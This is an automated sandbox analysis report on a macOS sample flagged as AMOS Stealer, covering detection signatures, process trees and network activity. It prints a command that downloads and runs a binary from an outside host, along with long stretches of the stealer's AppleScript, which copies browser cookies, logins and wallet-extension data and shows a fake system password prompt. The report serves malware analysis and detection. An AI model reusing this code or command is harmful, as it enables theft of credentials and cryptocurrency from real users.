Joe Sandbox Cloud Basic Analysis Report
Edit tour

macOS Analysis Report

Overview

General Information

Analysis ID:1594700
Infos:

Detection

AMOS Stealer
Score:60
Range:0 - 100
Whitelisted:false

Signatures

Detected AMOS Stealer
Executes Apple scripts with very long statement arguments
Executes the "csrutil" command used to retrieve or modify the "System Integrity Protection" configuration
Executes the "dscl" command with authonly argument (probably to verify the login password)
Executes Apple scripts and/or other OSA language scripts with shell command 'osascript'
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Executes the "kill" or "pkill" command typically used to terminate processes
Executes the "mkdir" command used to create folders
Executes the "system_profiler" command used to collect detailed system hardware and software information
Reads file resource fork extended attributes
Reads hardware related sysctl values
Reads the sysctl hardware model value (potentially used for VM-detection)
Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)
Reads the systems OS release and/or type
Reads the systems hostname
Uses AppleScript framework/components containing Apple Script related functionalities
Uses AppleScript scripting additions containing additional functionalities for Apple Scripts
Writes FAT Mach-O files to disk
Writes Mach-O files to the tmp directory

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

General Information

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1594700
Start date and time:2025-01-19 20:30:45 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 8s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultmaccmdlinecookbook.jbs
Analysis system description:Virtual Machine, Mojave (Office 16 16.27, Java 11.0.2+9, Adobe Reader 2019.010.20099)
macOS major version:10.14
CPU architecture:x86_64
Analysis Mode:default
Detection:MAL
Classification:mal60.spyw.evad.mac@0/4@2/0
  • Excluded IPs from analysis (whitelisted): 17.253.119.202, 17.253.119.201, 23.222.201.219, 17.253.21.204, 17.253.21.205, 17.36.200.79, 23.220.136.24
  • Excluded domains from analysis (whitelisted): mesu-cdn.apple.com.akadns.net, e11408.d.akamaiedge.net, lcdn-locator-usuqo.apple.com.akadns.net, updates.cdn-apple.com.akadns.net, gateway.icloud.com, e673.dsce9.akamaiedge.net, help-ar.apple.com.edgekey.net, crl.apple.com, lb._dns-sd._udp.0.11.168.192.in-addr.arpa, mesu-cdn.origin-apple.com.akadns.net, lcdn-locator.apple.com.akadns.net, help.origin-apple.com.akadns.net, lcdn-locator.apple.com, mesu.g.aaplimg.com, updates.g.aaplimg.com, itunes.apple.com.edgekey.net, help.apple.com, mesu.apple.com, init.itunes.apple.com, updates.cdn-apple.com, init-cdn.itunes-apple.com.akadns.net
  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: norikosumiya.com

Runtime Messages

Command:/bin/sh -c "curl -o /tmp/update https:/norikosumiya.com/brew/update && xattr -c /tmp/update && chmod +x /tmp/update && /tmp/update"
PID:615
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 229k 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0
87 229k 87 199k 0 0 94252 0 0:00:02 0:00:02 --:--:-- 94221
100 229k 100 229k 0 0 105k 0 0:00:02 0:00:02 --:--:-- 105k
sh: line 0: disown: current: no such job

Process Tree

  • System is macvm-mojave
  • nsurlstoraged (MD5: 321b0a40e24b45f0af49ba42742b3f64) Arguments: /usr/libexec/nsurlstoraged --privileged
  • sh (MD5: be55e8952a262d0e524239dbf82191ed) Arguments: /bin/sh -c curl -o /tmp/update https://norikosumiya.com/brew/update && xattr -c /tmp/update && chmod +x /tmp/update && /tmp/update
    • sh New Fork (PID: 616, Parent: 615)
    • curl (MD5: 2418204e23e2952e7995f1819a1f78f5) Arguments: curl -o /tmp/update https://norikosumiya.com/brew/update
    • sh New Fork (PID: 618, Parent: 615)
    • xattr (MD5: e2ca6555fe4b8c6a97d1ced2156c9b69) Arguments: xattr -c /tmp/update
    • Python (MD5: 710c6cc30780eea712240851b44d9eab) Arguments: /usr/bin/python /usr/bin/xattr-2.7 -c /tmp/update
    • sh New Fork (PID: 619, Parent: 615)
    • chmod (MD5: 917cfbf6084318922f8091f050a0bbed) Arguments: chmod +x /tmp/update
    • sh New Fork (PID: 620, Parent: 615)
    • update (MD5: 0418181caaba4686fae772b60d9a2c62) Arguments: /tmp/update
      • sh New Fork (PID: 621, Parent: 620)
        • sh New Fork (PID: 622, Parent: 621)
        • pkill (MD5: ad01660bd9fdfcf9c67a4879e06d0aa3) Arguments: pkill Terminal
      • sh New Fork (PID: 623, Parent: 620)
        • sh New Fork (PID: 624, Parent: 623)
        • osascript (MD5: f13b7c85f3c1c08fae3b709a536281a1) Arguments: osascript -e set release to trueset filegrabbers to trueon filesizer(paths)set fsz to 0tryset theItem to quoted form of POSIX path of pathsset fsz to (do shell script '/usr/bin/mdls -name kMDItemFSSize -raw ' & theItem)end tryreturn fszend filesizeron mkdir(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)do shell script 'mkdir -p ' & filePosixPathend tryend mkdiron FileName(filePath)tryset reversedPath to (reverse of every character of filePath) as stringset trimmedPath to text 1 thru ((offset of '/' in reversedPath) - 1) of reversedPathset finalPath to (reverse of every character of trimmedPath) as stringreturn finalPathend tryend FileNameon BeforeFileName(filePath)tryset lastSlash to offset of '/' in (reverse of every character of filePath) as stringset trimmedPath to text 1 thru -(lastSlash + 1) of filePathreturn trimmedPathend tryend BeforeFileNameon writeText(textToWrite, filePath)tryset folderPath to BeforeFileName(filePath)mkdir(folderPath)set fileRef to (open for access filePath with write permission)write textToWrite to fileRef starting at eofclose access fileRefend tryend writeTexton readwrite(path_to_file, path_as_save)tryset fileContent to read path_to_fileset folderPath to BeforeFileName(path_as_save)mkdir(folderPath)do shell script 'cat ' & quoted form of path_to_file & ' > ' & quoted form of path_as_saveend tryend readwriteon readwrite2(path_to_file, path_as_save)tryset folderPath to do shell script 'dirname ' & quoted form of path_as_savemkdir(folderPath)tell application 'Finder' set sourceFile to POSIX file path_to_file as alias set destinationFolder to POSIX file folderPath as alias duplicate sourceFile to destinationFolder with replacingend tellend tryend readwrite2on isDirectory(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)set fileType to (do shell script 'file -b ' & filePosixPath)if fileType ends with 'directory' thenreturn trueend ifreturn falseend tryend isDirectoryon GrabFolderLimit(sourceFolder, destinationFolder)tryset bankSize to 0set exceptionsList to {'.DS_Store', 'Partitions', 'Code Cache', 'Cache', 'market-history-cache.json', 'journals', 'Previews'}set fileList to list folder sourceFolder without invisiblesmkdir(destinationFolder)repeat with currentItem in fileListif currentItem is not in exceptionsList thenset itemPath to sourceFolder & '/' & currentItemset savePath to destinationFolder & '/' & currentItemif isDirectory(itemPath) thenGrabFolderLimit(itemPath, savePath)elseset fsz to filesizer(itemPath)set bankSize to bankSize + fszif bankSize < 10 * 1024 * 1024 thenreadwrite(itemPath, savePath)end ifend ifend ifend repeatend tryend GrabFolderLimiton GrabFolder(sourceFolder, destinationFolder)tryset exceptionsList to {'.DS_Store', 'Partitions', 'Code Cache', 'Cache', 'market-history-cache.json', 'journals', 'Previews', 'dumps', 'emoji', 'user_data', '__update__', 'user_data#2', 'user_data#3'}set fileList to list folder sourceFolder without invisiblesmkdir(destinationFolder)repeat with currentItem in fileListif currentItem is not in exceptionsList thenset itemPath to sourceFolder & '/' & currentItemset savePath to destinationFolder & '/' & currentItemif isDirectory(itemPath) thenGrabFolder(itemPath, savePath)elsereadwrite(itemPath, savePath)end ifend ifend repeatend tryend GrabFolderon parseFF(firefox, writemind)tryset myFiles to {'/cookies.sqlite', '/formhistory.sqlite', '/key4.db', '/logins.json'}set fileList to list folder firefox without invisiblesrepeat with currentItem in fileListset fpath to writemind & 'ff/' & currentItemset readpath to firefox & currentItemrepeat with FFile in myFilesreadwrite(readpath & FFile, fpath & FFile)end repeatend repeatend tryend parseFFon checkvalid(username, password_entered)tryset result to do shell script 'dscl . authonly ' & quoted form of username & space & quoted form of password_enteredif result is not equal to '' thenreturn falseelsereturn trueend ifon errorreturn falseend tryend checkvalidon getpwd(username, writemind)tryif checkvalid(username, '') thenset result to do shell script 'security 2>&1 > /dev/null find-generic-password -ga \'Chrome\' | awk \'{print $2}\''writeText(result as string, writemind & 'masterpass-chrome')elserepeatset result to display dialog 'Required Application Helper.\nPlease enter password for continue.' default answer '' with icon caution buttons {'Continue'} default button 'Continue' giving up after 150 with title 'System Preferences' with hidden answerset password_entered to text returned of resultif checkvalid(username, password_entered) thenwriteText(password_entered, writemind & 'pwd')return password_enteredend ifend repeatend ifend tryreturn ''end getpwdon grabPlugins(paths, savePath, pluginList, index)tryset fileList to list folder paths without invisiblesrepeat with PFile in fileListrepeat with Plugin in pluginListif (PFile contains Plugin) thenset newpath to paths & PFileset newsavepath to savePath & '/' & Pluginif index thenset newsavepath to newsavepath & '/IndexedDB/'end ifGrabFolder(newpath, newsavepath)end ifend repeatend repeatend tryend grabPluginson chromium(writemind, chromium_map)set pluginList to {'keenhcnmdmjjhincpilijphpiohdppno', 'hbbgbephgojikajhfbomhlmmollphcad', 'cjmkndjhnagcfbpiemnkdpomccnjblmj', 'dhgnlgphgchebgoemcjekedjjbifijid', 'hifafgmccdpekplomjjkcfgodnhcellj', 'kamfleanhcmjelnhaeljonilnmjpkcjc', 'jnldfbidonfeldmalbflbmlebbipcnle', 'fdcnegogpncmfejlfnffnofpngdiejii', 'klnaejjgbibmhlephnhpmaofohgkpgkd', 'pdadjkfkgcafgbceimcpbkalnfnepbnk', 'kjjebdkfeagdoogagbhepmbimaphnfln', 'ldinpeekobnhjjdofggfgjlcehhmanlj', 'dkdedlpgdmmkkfjabffeganieamfklkm', 'bcopgchhojmggmffilplmbdicgaihlkp', 'kpfchfdkjhcoekhdldggegebfakaaiog', 'idnnbdplmphpflfnlkomgpfbpcgelopg', 'mlhakagmgkmonhdonhkpjeebfphligng', 'bipdhagncpgaccgdbddmbpcabgjikfkn', 'gcbjmdjijjpffkpbgdkaojpmaninaion', 'nhnkbkgjikgcigadomkphalanndcapjk', 'bhhhlbepdkbapadjdnnojkbgioiodbic', 'hoighigmnhgkkdaenafgnefkcmipfjon', 'klghhnkeealcohjjanjjdaeeggmfmlpl', 'nkbihfbeogaeaoehlefnkodbefgpgknn', 'fhbohimaelbohpjbbldcngcnapndodjp', 'ebfidpplhabeedpnhjnobghokpiioolj', 'emeeapjkbcbpbpgaagfchmcgglmebnen', 'fldfpgipfncgndfolcbkdeeknbbbnhcc', 'penjlddjkjgpnkllboccdgccekpkcbin', 'fhilaheimglignddkjgofkcbgekhenbh', 'hmeobnfnfcmdkdcmlblgagmfpfboieaf', 'cihmoadaighcejopammfbmddcmdekcje', 'lodccjjbdhfakaekdiahmedfbieldgik', 'omaabbefbmiijedngplfjmnooppbclkk', 'cjelfplplebdjjenllpjcblmjkfcffne', 'jnlgamecbpmbajjfhmmmlhejkemejdma', 'fpkhgmpbidmiogeglndfbkegfdlnajnf', 'bifidjkcdpgfnlbcjpdkdcnbiooooblg', 'amkmjjmmflddogmhpjloimipbofnfjih', 'flpiciilemghbmfalicajoolhkkenfel', 'hcflpincpppdclinealmandijcmnkbgn', 'aeachknmefphepccionboohckonoeemg', 'nlobpakggmbcgdbpjpnagmdbdhdhgphk', 'momakdpclmaphlamgjcndbgfckjfpemp', 'mnfifefkajgofkcjkemidiaecocnkjeh', 'fnnegphlobjdpkhecapkijjdkgcjhkib', 'ehjiblpccbknkgimiflboggcffmpphhp', 'ilhaljfiglknggcoegeknjghdgampffk', 'pgiaagfkgcbnmiiolekcfmljdagdhlcm', 'fnjhmkhhmkbjkkabndcnnogagogbneec', 'bfnaelmomeimhlpmgjnjophhpkkoljpa', 'imlcamfeniaidioeflifonfjeeppblda', 'mdjmfdffdcmnoblignmgpommbefadffd', 'ooiepdgjjnhcmlaobfinbomgebfgablh', 'pcndjhkinnkaohffealmlmhaepkpmgkb', 'ppdadbejkmjnefldpcdjhnkpbjkikoip', 'cgeeodpfagjceefieflmdfphplkenlfk', 'dlcobpjiigpikoobohmabehhmhfoodbb', 'jiidiaalihmmhddjgbnbgdfflelocpak', 'bocpokimicclpaiekenaeelehdjllofo', 'pocmplpaccanhmnllbbkpgfliimjljgo', 'cphhlgmgameodnhkjdmkpanlelnlohao', 'mcohilncbfahbmgdjkbpemcciiolgcge', 'bopcbmipnjdcdfflfgjdgdjejmgpoaab', 'khpkpbbcccdmmclmpigdgddabeilkdpd', 'ejjladinnckdgjemekebdpeokbikhfci', 'phkbamefinggmakgklpkljjmgibohnba', 'epapihdplajcdnnkdeiahlgigofloibg', 'hpclkefagolihohboafpheddmmgdffjm', 'cjookpbkjnpkmknedggeecikaponcalb', 'cpmkedoipcpimgecpmgpldfpohjplkpp', 'modjfdjcodmehnpccdjngmdfajggaoeh', 'ibnejdfjmmkpcnlpebklmnkoeoihofec', 'afbcbjpbpfadlkmhmclhkeeodmamcflc', 'kncchdigobghenbbaddojjnnaogfppfj', 'efbglgofoippbgcjepnhiblaibcnclgk', 'mcbigmjiafegjnnogedioegffbooigli', 'fccgmnglbhajioalokbcidhcaikhlcpm', 'hnhobjmcibchnmglfbldbfabcgaknlkj', 'apnehcjmnengpnmccpaibjmhhoadaico', 'enabgbdfcbaehmbigakijjabdpdnimlg', 'mgffkfbidihjpoaomajlbgchddlicgpn', 'fopmedgnkfpebgllppeddmmochcookhc', 'jojhfeoedkpkglbfimdfabpdfjaoolaf', 'ammjlinfekkoockogfhdkgcohjlbhmff', 'abkahkcbhngaebpcgfmhkoioedceoigp', 'dcbjpgbkjoomeenajdabiicabjljlnfp', 'gkeelndblnomfmjnophbhfhcjbcnemka', 'pnndplcbkakcplkjnolgbkdgjikjednm', 'copjnifcecdedocejpaapepagaodgpbh', 'hgbeiipamcgbdjhfflifkgehomnmglgk', 'mkchoaaiifodcflmbaphdgeidocajadp', 'ellkdbaphhldpeajbepobaecooaoafpg', 'mdnaglckomeedfbogeajfajofmfgpoae', 'nknhiehlklippafakaeklbeglecifhad', 'ckklhkaabbmdjkahiaaplikpdddkenic', 'fmblappgoiilbgafhjklehhfifbdocee', 'nphplpgoakhhjchkkhmiggakijnkhfnd', 'cnmamaachppnkjgnildpdmkaakejnhae', 'fijngjgcjhjmmpcmkeiomlglpeiijkld', 'niiaamnmgebpeejeemoifgdndgeaekhe', 'odpnjmimokcmjgojhnhfcnalnegdjmdn', 'lbjapbcmmceacocpimbpbidpgmlmoaao', 'hnfanknocfeofbddgcijnmhnfnkdnaad', 'hpglfhgfnhbgpjdenjgmdgoeiappafln', 'egjidjbpglichdcondbcbdnbeeppgdph', 'ibljocddagjghmlpgihahamcghfggcjc', 'gkodhkbmiflnmkipcmlhhgadebbeijhh', 'dbgnhckhnppddckangcjbkjnlddbjkna', 'mfhbebgoclkghebffdldpobeajmbecfk', 'nlbmnnijcnlegkjjpcfjclmcfggfefdm', 'nlgbhdfgdhgbiamfdfmbikcdghidoadd', 'acmacodkjbdgmoleebolmdjonilkdbch', 'agoakfejjabomempkjlepdflaleeobhb', 'dgiehkgfknklegdhekgeabnhgfjhbajd', 'onhogfjeacnfoofkfgppdlbmlmnplgbn', 'kkpehldckknjffeakihjajcjccmcjflh', 'jaooiolkmfcmloonphpiiogkfckgciom', 'ojggmchlghnjlapmfbnjholfjkiidbch', 'pmmnimefaichbcnbndcfpaagbepnjaig', 'oiohdnannmknmdlddkdejbmplhbdcbee', 'aiifbnbfobpmeekipheeijimdpnlpgpp', 'aholpfdialjgjfhomihkjbmgjidlcdno', 'anokgmphncpekkhclmingpimjmcooifb', 'kkpllkodjeloidieedojogacfhpaihoh', 'iokeahhehimjnekafflcihljlcjccdbe', 'ifckdpamphokdglkkdomedpdegcjhjdp', 'loinekcabhlmhjjbocijdoimmejangoa', 'fcfcfllfndlomdhbehjjcoimbgofdncg', 'ifclboecfhkjbpmhgehodcjpciihhmif', 'dmkamcknogkgcdfhhbddcghachkejeap', 'ookjlbkiijinhpmnjffcofjonbfbgaoc', 'oafedfoadhdjjcipmcbecikgokpaphjk', 'mapbhaebnddapnmifbbkgeedkeplgjmf', 'cmndjbe
          • sh (MD5: be55e8952a262d0e524239dbf82191ed) Arguments: sh -c echo $((RANDOM % 9000 + 1000))
          • sh (MD5: be55e8952a262d0e524239dbf82191ed) Arguments: sh -c system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType
          • sh (MD5: be55e8952a262d0e524239dbf82191ed) Arguments: sh -c mkdir -p '/tmp/4302'
          • mkdir (MD5: bbbaafd2a4d7dcb9ddd178d814fea708) Arguments: mkdir -p /tmp/4302
          • sh (MD5: be55e8952a262d0e524239dbf82191ed) Arguments: sh -c dscl . authonly 'root' ''
          • dscl (MD5: 9a2337f2a5a6271e0187153296de3c9f) Arguments: dscl . authonly root
  • dirhelper (MD5: 23edb05ab305e115e8874baa5b1e3004) Arguments: /usr/libexec/dirhelper
  • eficheck (MD5: 328beb81a2263449258057506bb4987f) Arguments: /usr/libexec/firmwarecheckers/eficheck/eficheck --integrity-check-daemon
  • cleanup

Yara Signatures

No yara matches

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

  • Compliance
  • Networking
  • System Summary
  • Persistence and Installation Behavior
  • Hooking and other Techniques for Hiding and Protection
  • Malware Analysis System Evasion
  • HIPS / PFW / Operating System Protection Evasion
  • Language, Device and Operating System Detection
  • Stealing of Sensitive Information

Click to jump to signature section

Show All Signature Results
Source: unknownHTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49349 version: TLS 1.2
Source: unknownHTTPS traffic detected: 17.248.228.69:443 -> 192.168.11.12:49350 version: TLS 1.2
Source: unknownHTTPS traffic detected: 81.19.135.228:443 -> 192.168.11.12:49356 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49388 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49389 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49395 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49396 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49397 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49398 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49399 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49400 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49401 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49402 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49403 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 23.55.204.208
Source: unknownTCP traffic detected without corresponding DNS query: 23.55.204.208
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /brew/update HTTP/1.1Host: norikosumiya.comUser-Agent: curl/7.54.0Accept: */*
Source: global trafficDNS traffic detected: DNS query: norikosumiya.com
Source: global trafficDNS traffic detected: DNS query: h3.apis.apple.map.fastly.net
Source: /usr/bin/curl (PID: 616)Reads from socket in process: dataJump to behavior
Source: update, 00000620.00000260.9.000000010527f000.00000001052a8000.r--.sdmpString found in binary or memory: http://crl.apple.com/codesigning.crl0
Source: update, 00000620.00000260.9.000000010527f000.00000001052a8000.r--.sdmp, update, 00000620.00000260.1.0000000101bc7000.0000000101bcd000.r--.sdmp, update.251.drString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: update, 00000620.00000260.9.000000010527f000.00000001052a8000.r--.sdmpString found in binary or memory: http://www.apple.com/appleca/root.crl0
Source: update, 00000620.00000260.9.000000010527f000.00000001052a8000.r--.sdmpString found in binary or memory: http://www.apple.com/certificateauthority0
Source: update, 00000620.00000260.9.000000010527f000.00000001052a8000.r--.sdmpString found in binary or memory: https://www.apple.com/appleca/0
Source: unknownNetwork traffic detected: HTTP traffic on port 49399 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49403
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49402
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49401
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49389
Source: unknownNetwork traffic detected: HTTP traffic on port 49397 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49400
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49388
Source: unknownNetwork traffic detected: HTTP traffic on port 49395 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49388 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49401 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49403 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49398 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49350 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49356
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49399
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49398
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49397
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49396
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49395
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49350
Source: unknownNetwork traffic detected: HTTP traffic on port 49396 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49356 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49389 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49400 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49402 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49349 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49349
Source: /usr/bin/curl (PID: 616)Writes from socket in process: dataJump to behavior
Source: unknownHTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49349 version: TLS 1.2
Source: unknownHTTPS traffic detected: 17.248.228.69:443 -> 192.168.11.12:49350 version: TLS 1.2
Source: unknownHTTPS traffic detected: 81.19.135.228:443 -> 192.168.11.12:49356 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49388 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49389 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49395 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49396 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49397 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49398 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49399 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49400 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49401 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49402 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49403 version: TLS 1.2
Source: classification engineClassification label: mal60.spyw.evad.mac@0/4@2/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 624)Osascript command executed: osascript -e set release to trueset filegrabbers to trueon filesizer(paths)set fsz to 0tryset theItem to quoted form of POSIX path of pathsset fsz to (do shell script '/usr/bin/mdls -name kMDItemFSSize -raw ' & theItem)end tryreturn fszend filesizeron mkdir(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)do shell script 'mkdir -p ' & filePosixPathend tryend mkdiron FileName(filePath)tryset reversedPath to (reverse of every character of filePath) as stringset trimmedPath to text 1 thru ((offset of '/' in reversedPath) - 1) of reversedPathset finalPath to (reverse of every character of trimmedPath) as stringreturn finalPathend tryend FileNameon BeforeFileName(filePath)tryset lastSlash to offset of '/' in (reverse of every character of filePath) as stringset trimmedPath to text 1 thru -(lastSlash + 1) of filePathreturn trimmedPathend tryend BeforeFileNameon writeText(textToWrite, filePath)tryset folderPath to BeforeFileName(filePath)mkdir(folderPath)set fileRef to (open for access filePath with write permission)write textToWrite to fileRef starting at eofclose access fileRefend tryend writeTexton readwrite(path_to_file, path_as_save)tryset fileContent to read path_to_fileset folderPath to BeforeFileName(path_as_save)mkdir(folderPath)do shell script 'cat ' & quoted form of path_to_file & ' > ' & quoted form of path_as_saveend tryend readwriteon readwrite2(path_to_file, path_as_save)tryset folderPath to do shell script 'dirname ' & quoted form of path_as_savemkdir(folderPath)tell application 'Finder' set sourceFile to POSIX file path_to_file as alias set destinationFolder to POSIX file folderPath as alias duplicate sourceFile to destinationFolder with replacingend tellend tryend readwrite2on isDirectory(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)set fileType to (do shell script 'file -b ' & filePosixPath)if fileType ends with 'directory' thenreturn trueend ifreturn falseend tryend isDirectoryon GrabFolderLimit(sourceFolder, destinationFolder)tryset bankSize to 0set exceptionsList to {'.DS_Store', 'Partitions', 'Code Cache', 'Cache', 'market-history-cache.json', 'journals', 'Previews'}set fileList to list folder sourceFolder without invisiblesmkdir(destinationFolder)repeat with currentItem in fileListif currentItem is not in exceptionsList thenset itemPath to sourceFolder & '/' & currentItemset savePath to destinationFolder & '/' & currentItemif isDirectory(itemPath) thenGrabFolderLimit(itemPath, savePath)elseset fsz to filesizer(itemPath)set bankSize to bankSize + fszif bankSize < 10 * 1024 * 1024 thenreadwrite(itemPath, savePath)end ifend ifend ifend repeatend tryend GrabFolderLimiton GrabFolder(sourceFolder, destinationFolder)tryset exceptionsJump to behavior
Source: /bin/sh (PID: 624)Osascript command executed: osascript -e set release to trueset filegrabbers to trueon filesizer(paths)set fsz to 0tryset theItem to quoted form of POSIX path of pathsset fsz to (do shell script '/usr/bin/mdls -name kMDItemFSSize -raw ' & theItem)end tryreturn fszend filesizeron mkdir(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)do shell script 'mkdir -p ' & filePosixPathend tryend mkdiron FileName(filePath)tryset reversedPath to (reverse of every character of filePath) as stringset trimmedPath to text 1 thru ((offset of '/' in reversedPath) - 1) of reversedPathset finalPath to (reverse of every character of trimmedPath) as stringreturn finalPathend tryend FileNameon BeforeFileName(filePath)tryset lastSlash to offset of '/' in (reverse of every character of filePath) as stringset trimmedPath to text 1 thru -(lastSlash + 1) of filePathreturn trimmedPathend tryend BeforeFileNameon writeText(textToWrite, filePath)tryset folderPath to BeforeFileName(filePath)mkdir(folderPath)set fileRef to (open for access filePath with write permission)write textToWrite to fileRef starting at eofclose access fileRefend tryend writeTexton readwrite(path_to_file, path_as_save)tryset fileContent to read path_to_fileset folderPath to BeforeFileName(path_as_save)mkdir(folderPath)do shell script 'cat ' & quoted form of path_to_file & ' > ' & quoted form of path_as_saveend tryend readwriteon readwrite2(path_to_file, path_as_save)tryset folderPath to do shell script 'dirname ' & quoted form of path_as_savemkdir(folderPath)tell application 'Finder' set sourceFile to POSIX file path_to_file as alias set destinationFolder to POSIX file folderPath as alias duplicate sourceFile to destinationFolder with replacingend tellend tryend readwrite2on isDirectory(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)set fileType to (do shell script 'file -b ' & filePosixPath)if fileType ends with 'directory' thenreturn trueend ifreturn falseend tryend isDirectoryon GrabFolderLimit(sourceFolder, destinationFolder)tryset bankSize to 0set exceptionsList to {'.DS_Store', 'Partitions', 'Code Cache', 'Cache', 'market-history-cache.json', 'journals', 'Previews'}set fileList to list folder sourceFolder without invisiblesmkdir(destinationFolder)repeat with currentItem in fileListif currentItem is not in exceptionsList thenset itemPath to sourceFolder & '/' & currentItemset savePath to destinationFolder & '/' & currentItemif isDirectory(itemPath) thenGrabFolderLimit(itemPath, savePath)elseset fsz to filesizer(itemPath)set bankSize to bankSize + fszif bankSize < 10 * 1024 * 1024 thenreadwrite(itemPath, savePath)end ifend ifend ifend repeatend tryend GrabFolderLimiton GrabFolder(sourceFolder, destinationFolder)tryset exceptionsJump to behavior
Source: /Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32 (PID: 615)Shell command executed: /bin/sh -c curl -o /tmp/update https://norikosumiya.com/brew/update && xattr -c /tmp/update && chmod +x /tmp/update && /tmp/updateJump to behavior
Source: /tmp/update (PID: 620)Shell command executed: sh -c disown pkill TerminalJump to behavior
